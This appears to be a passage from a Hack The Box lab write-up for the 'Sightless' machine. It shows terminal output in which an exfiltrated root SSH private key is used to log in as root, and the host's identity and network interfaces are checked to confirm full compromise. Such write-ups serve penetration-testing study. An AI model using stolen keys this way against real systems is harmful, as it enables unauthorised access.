SSH
Testing the exfiltrated credential of the root account against the target SSH server
┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ chmod 600 ./id_rsa.root
┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ ssh root@$IP -i ./id_rsa.root
Last login: Tue Sep 3 08:18:45 2024
root@sightless:~# whoami
root
root@sightless:~# hostname
sightless
root@sightless:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:66:f5 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.242.165/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2866sec preferred_lft 2866sec
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:67:f9:e1:ff brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
5: veth59e2fb7@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 62:bd:18:73:93:71 brd ff:ff:ff:ff:ff:ff link-netnsid 0System Level Compromise